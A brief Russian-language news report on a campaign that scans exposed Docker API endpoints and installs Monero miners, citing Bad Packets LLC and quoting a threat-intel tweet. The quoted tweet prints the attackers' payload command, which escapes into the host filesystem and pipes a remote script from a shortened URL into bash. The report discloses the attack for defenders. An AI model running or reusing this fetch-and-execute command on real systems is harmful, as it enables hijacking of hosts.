Скрытые майнеры криптовалюты обнаружены в уязвимых контейнерах Docker

Группа хакеров запустила масштабную кампанию по поиску Docker-контейнеров с открытыми конечными точками API для последующей установки на них майнера криптовалюты Monero (XMR). Проблема была обнаружена специалистами по кибербезопасности из компании Bad Packets LLC.
Opportunistic mass scanning activity detected targeting exposed Docker API endpoints.
These scans create a container using an Alpine Linux image, and execute the payload via:
«Command»: «chroot /mnt /bin/sh -c ‘curl -sL4 https://t.co/q047bRPUyj | bash;’», #threatintel pic.twitter.com/vxszV5SF1o
Источник